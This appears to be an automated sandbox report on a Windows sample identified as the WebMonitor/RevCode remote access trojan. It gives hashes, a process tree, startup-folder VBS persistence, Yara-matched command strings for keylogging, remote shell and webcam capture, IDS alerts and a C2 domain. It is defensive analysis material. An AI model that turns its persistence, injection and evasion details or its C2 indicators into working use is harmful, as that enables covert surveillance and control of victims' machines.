Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
regscs.exe

Overview

General Information

Sample name:regscs.exe
Analysis ID:1535915
MD5:fe4001f3584462a292bff67b021a7337
SHA1:5543207ebed4d7b50a350ece848c103dc7805f03
SHA256:9fbe0f24d1f2b9145043e85fe3b7dcfe3f5c76a2d4910487992d90ada0c7c520
Tags:exeuser-scx
Infos:

Detection

WebMonitor RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected WebMonitor RAT
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • regscs.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\regscs.exe" MD5: FE4001F3584462A292BFF67B021A7337)
    • regscs.exe (PID: 6404 cmdline: "C:\Users\user\Desktop\regscs.exe" MD5: FE4001F3584462A292BFF67B021A7337)
  • wscript.exe (PID: 1188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • regscs.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\regscs.exe" MD5: FE4001F3584462A292BFF67B021A7337)
      • regscs.exe (PID: 1696 cmdline: "C:\Users\user\Desktop\regscs.exe" MD5: FE4001F3584462A292BFF67B021A7337)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_WebMonitorYara detected WebMonitor RATJoe Security
    00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Revcoderat_8e6d4182unknownunknown
    • 0x26810:$a1: PLUGIN_PROCESS_REVERSE_PROXY: Plugin already exists, skipping download!
    • 0x14678:$a2: TARGET_HOST_UPDATE(): Sync successful!
    • 0x13968:$a3: WEBCAM_ACTIVATE: Plugin already exists, skipping download!
    • 0x264e4:$a4: send_keylog_get
    00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmpMALWARE_Win_RevCodeRATDetects RevCode/WebMonitor RATditekSHen
    • 0x11568:$x1: rev-novm.dat
    • 0x13cdc:$x2: WebMonitor-
    • 0x14784:$x3: WebMonitor Client
    • 0x12864:$x4: Launch WebMonitor
    • 0x27148:$s1: KEYLOG_DEL
    • 0x27160:$s2: KEYLOG_STREAM_START
    • 0x264d4:$s3: send_keylog_del
    • 0x111bc:$s4: send_keylog_stream_
    • 0x264f4:$s4: send_keylog_stream_
    • 0x26510:$s4: send_keylog_stream_
    • 0x128e8:$s5: send_shell_exec
    • 0x264bc:$s6: send_file_download_exec
    • 0x26544:$s7: send_pdg_exec
    • 0x26334:$s8: send_app_cmd_upd
    • 0x13a14:$s9: send_webcamstream_start
    • 0x14a10:$s10: send_screenstream_start
    • 0x263d8:$s11: send_clipboard_get
    • 0x26554:$s12: send_pdg_rev_proxy_stop
    • 0x26758:$s13: send_shell_stop
    • 0x267b0:$s14: send_wnd_cmd
    • 0x149c0:$s15: SCREEN_STREAM_LEGACY(): Started...
    Process Memory Space: regscs.exe PID: 7068JoeSecurity_WebMonitorYara detected WebMonitor RATJoe Security
      Process Memory Space: regscs.exe PID: 7068JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        0.2.regscs.exe.29e0000.0.unpackJoeSecurity_WebMonitorYara detected WebMonitor RATJoe Security
          0.2.regscs.exe.29e0000.0.unpackWindows_Trojan_Revcoderat_8e6d4182unknownunknown
          • 0x86810:$a1: PLUGIN_PROCESS_REVERSE_PROXY: Plugin already exists, skipping download!
          • 0x74678:$a2: TARGET_HOST_UPDATE(): Sync successful!
          • 0x73968:$a3: WEBCAM_ACTIVATE: Plugin already exists, skipping download!
          • 0x864e4:$a4: send_keylog_get
          0.2.regscs.exe.29e0000.0.unpackMALWARE_Win_RevCodeRATDetects RevCode/WebMonitor RATditekSHen
          • 0x71568:$x1: rev-novm.dat
          • 0x73cdc:$x2: WebMonitor-
          • 0x74784:$x3: WebMonitor Client
          • 0x72864:$x4: Launch WebMonitor
          • 0x87148:$s1: KEYLOG_DEL
          • 0x87160:$s2: KEYLOG_STREAM_START
          • 0x864d4:$s3: send_keylog_del
          • 0x711bc:$s4: send_keylog_stream_
          • 0x864f4:$s4: send_keylog_stream_
          • 0x86510:$s4: send_keylog_stream_
          • 0x728e8:$s5: send_shell_exec
          • 0x864bc:$s6: send_file_download_exec
          • 0x86544:$s7: send_pdg_exec
          • 0x86334:$s8: send_app_cmd_upd
          • 0x73a14:$s9: send_webcamstream_start
          • 0x74a10:$s10: send_screenstream_start
          • 0x863d8:$s11: send_clipboard_get
          • 0x86554:$s12: send_pdg_rev_proxy_stop
          • 0x86758:$s13: send_shell_stop
          • 0x867b0:$s14: send_wnd_cmd
          • 0x749c0:$s15: SCREEN_STREAM_LEGACY(): Started...
          0.2.regscs.exe.2a40000.1.raw.unpackJoeSecurity_WebMonitorYara detected WebMonitor RATJoe Security
            0.2.regscs.exe.2a40000.1.raw.unpackWindows_Trojan_Revcoderat_8e6d4182unknownunknown
            • 0x26810:$a1: PLUGIN_PROCESS_REVERSE_PROXY: Plugin already exists, skipping download!
            • 0x14678:$a2: TARGET_HOST_UPDATE(): Sync successful!
            • 0x13968:$a3: WEBCAM_ACTIVATE: Plugin already exists, skipping download!
            • 0x264e4:$a4: send_keylog_get
            Click to see the 4 entries

            System Summary

            barindex
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , ProcessId: 1188, ProcessName: wscript.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs" , ProcessId: 1188, ProcessName: wscript.exe

            Data Obfuscation

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\regscs.exe, ProcessId: 7068, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-17T12:36:18.061159+020020229301A Network Trojan was detected52.149.20.212443192.168.2.449730TCP
            2024-10-17T12:36:57.442571+020020229301A Network Trojan was detected52.149.20.212443192.168.2.449738TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-17T12:37:06.336578+020020323611Domain Observed Used for C2 Detected192.168.2.4495191.1.1.153UDP
            2024-10-17T12:37:48.818793+020020323611Domain Observed Used for C2 Detected192.168.2.4498261.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: regscs.exeAvira: detected
            Source: regscs.exeReversingLabs: Detection: 78%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: regscs.exeJoe Sandbox ML: detected
            Source: regscs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2032361 - Severity 1 - ET MALWARE WebMonitor/RevCode RAT CnC Domain in DNS Lookup : 192.168.2.4:49519 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2032361 - Severity 1 - ET MALWARE WebMonitor/RevCode RAT CnC Domain in DNS Lookup : 192.168.2.4:49826 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 194.58.200.20 194.58.200.20
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49738
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
            Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 1.2.4.8
            Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
            Source: unknownUDP traffic detected without corresponding DNS query: 114.114.114.114
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: sdns.se
            Source: global trafficDNS traffic detected: DNS query: ntp.se
            Source: global trafficDNS traffic detected: DNS query: 2aa4ccb27ab65b064eae52e993d5dbff.se
            Source: global trafficDNS traffic detected: DNS query: ee01439035b99fed4b57e5bd255d5faa.se
            Source: global trafficDNS traffic detected: DNS query: oryadshow.wm01.to
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0.0.0.0/recv5.php
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0/recv5.php
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0/recv5.php3
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0/recv5.phpic
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0/recv5.phpo
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oryadshow.wm01.to/
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oryadshow.wm01.to/X
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.0000000000620000.00000004.00000020.00020000.00000000.sdmp, regscs.exe, 00000001.00000002.2935689636.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oryadshow.wm01.to/recv5.php
            Source: regscs.exe, 00000001.00000002.2935689636.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oryadshow.wm01.to/recv5.phppp
            Source: Yara matchFile source: Process Memory Space: regscs.exe PID: 7068, type: MEMORYSTR

            System Summary

            barindex
            Source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 Author: unknown
            Source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RevCode/WebMonitor RAT Author: ditekSHen
            Source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 Author: unknown
            Source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RevCode/WebMonitor RAT Author: ditekSHen
            Source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 Author: unknown
            Source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPEMatched rule: Detects RevCode/WebMonitor RAT Author: ditekSHen
            Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revcoderat_8e6d4182 Author: unknown
            Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RevCode/WebMonitor RAT Author: ditekSHen
            Source: Process Memory Space: regscs.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_Revcoderat_8e6d4182 Author: unknown
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BB83D NtMapViewOfSection,0_2_004BB83D
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BA4A9 NtQueryInformationProcess,0_2_004BA4A9
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004B84BF NtResumeThread,0_2_004B84BF
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004B9925 NtUnmapViewOfSection,0_2_004B9925
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004B9670 NtCreateSection,0_2_004B9670
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004B8A17 NtQueryInformationProcess,0_2_004B8A17
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004B884E NtMapViewOfSection,0_2_004B884E
            Source: C:\Users\user\Desktop\regscs.exeCode function: 0_2_004BDA78 NtUnmapViewOfSection,0_2_004BDA78
            Source: regscs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 reference_sample = 77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revcoderat, fingerprint = bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78, id = 8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4, last_modified = 2022-01-13
            Source: 0.2.regscs.exe.29e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevCodeRAT snort2_sid = 920070, author = ditekSHen, description = Detects RevCode/WebMonitor RAT, clamav_sig = MALWARE.Win.Trojan.RevCodeRAT, snort3_sid = 920070
            Source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 reference_sample = 77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revcoderat, fingerprint = bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78, id = 8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4, last_modified = 2022-01-13
            Source: 0.2.regscs.exe.2a40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevCodeRAT snort2_sid = 920070, author = ditekSHen, description = Detects RevCode/WebMonitor RAT, clamav_sig = MALWARE.Win.Trojan.RevCodeRAT, snort3_sid = 920070
            Source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revcoderat_8e6d4182 reference_sample = 77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revcoderat, fingerprint = bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78, id = 8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4, last_modified = 2022-01-13
            Source: 0.2.regscs.exe.2a40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevCodeRAT snort2_sid = 920070, author = ditekSHen, description = Detects RevCode/WebMonitor RAT, clamav_sig = MALWARE.Win.Trojan.RevCodeRAT, snort3_sid = 920070
            Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revcoderat_8e6d4182 reference_sample = 77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revcoderat, fingerprint = bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78, id = 8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4, last_modified = 2022-01-13
            Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RevCodeRAT snort2_sid = 920070, author = ditekSHen, description = Detects RevCode/WebMonitor RAT, clamav_sig = MALWARE.Win.Trojan.RevCodeRAT, snort3_sid = 920070
            Source: Process Memory Space: regscs.exe PID: 7068, type: MEMORYSTRMatched rule: Windows_Trojan_Revcoderat_8e6d4182 reference_sample = 77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revcoderat, fingerprint = bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78, id = 8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@8/1@55/1
            Source: C:\Users\user\Desktop\regscs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbsJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeMutant created: \Sessions\1\BaseNamedObjects\NtCFd7TtbdjUY0F4kEjj8hTOZp75XYEy2.00
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs"
            Source: C:\Users\user\Desktop\regscs.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: regscs.exeReversingLabs: Detection: 78%
            Source: unknownProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe" Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeProcess created: C:\Users\user\Desktop\regscs.exe "C:\Users\user\Desktop\regscs.exe" Jump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: olepro32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: olepro32.dllJump to behavior
            Source: C:\Users\user\Desktop\regscs.exeSection loaded: windows.storage.dllJump to behavior
